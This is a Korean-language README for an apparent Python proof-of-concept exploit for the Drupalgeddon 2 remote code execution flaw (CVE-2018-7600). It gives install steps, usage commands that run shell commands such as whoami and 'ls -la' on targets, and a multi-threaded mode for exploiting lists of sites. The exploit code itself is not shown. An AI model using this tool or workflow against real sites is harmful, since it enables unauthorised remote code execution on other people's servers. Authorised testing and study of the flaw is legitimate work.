
이 저장소는 Drupalgeddon 2로 널리 알려진 CVE-2018-7600에 대한 완전 자체 개발 PoC(Proof-of-Concept)를 선보입니다. Drupal 7 및 8 코어의 이 치명적인 취약점은 원격 코드 실행(RCE)을 가능하게 하며, PoC는 해당 악용을 명확하고 교육적인 방식으로 시연합니다.
이 저장소는 Drupal에서 Drupalgeddon2(CVE-2018-7600)로 알려진 치명적인 원격 코드 실행 취약점에 대한 Python 기반 개념 증명 익스플로잇을 포함합니다. 이 스크립트는 교육 목적과 보안 전문가가 승인된 침투 테스트 시나리오에서 사용하도록 설계되었습니다.
이 도구는 합법적이고 윤리적인 목적으로만 사용해야 합니다. 소유자의 명시적인 허가 없이 어떤 시스템에서든 이 스크립트를 사용하는 것은 불법입니다. 작성자와 기여자는 이 스크립트로 인한 오용이나 피해에 대해 책임지지 않습니다. 사용에 따른 책임은 본인에게 있습니다.
requests 라이브러리colorama 라이브러리git clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
이 스크립트는 실행을 사용자 지정할 수 있는 여러 명령줄 인자를 제공합니다.
기본 명령(whoami)으로 단일 대상 익스플로잇:
python3 drupalgeddon2.py -t http://example.com
사용자 지정 명령(예: ls -la)으로 단일 대상 익스플로잇:
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
파일에서 대상 목록 스캔:
targets.txt라는 파일을 만들고 각 줄에 URL을 하나씩 입력합니다:
http://site1.com
https://site2.org
http://site3.net
그런 다음 스크립트를 실행합니다:
python3 drupalgeddon2.py -l targets.txt
사용자 지정 명령과 증가된 스레드 수로 목록 스캔:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
출력을 로그 파일로 저장:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argument | Short | Description | Default |
|---|
--target | -t | 단일 대상 URL입니다. | - |
--list | -l | 대상 URL 목록이 포함된 파일의 경로입니다. | - |
--command | -c | 대상에서 실행할 명령입니다. | whoami |
--threads | -T | 사용할 동시 스레드 수입니다. | 5 |
--output | -o | 출력을 기록할 파일입니다. | - |
--timeout | 요청 시간 제한(초)입니다. | 15 |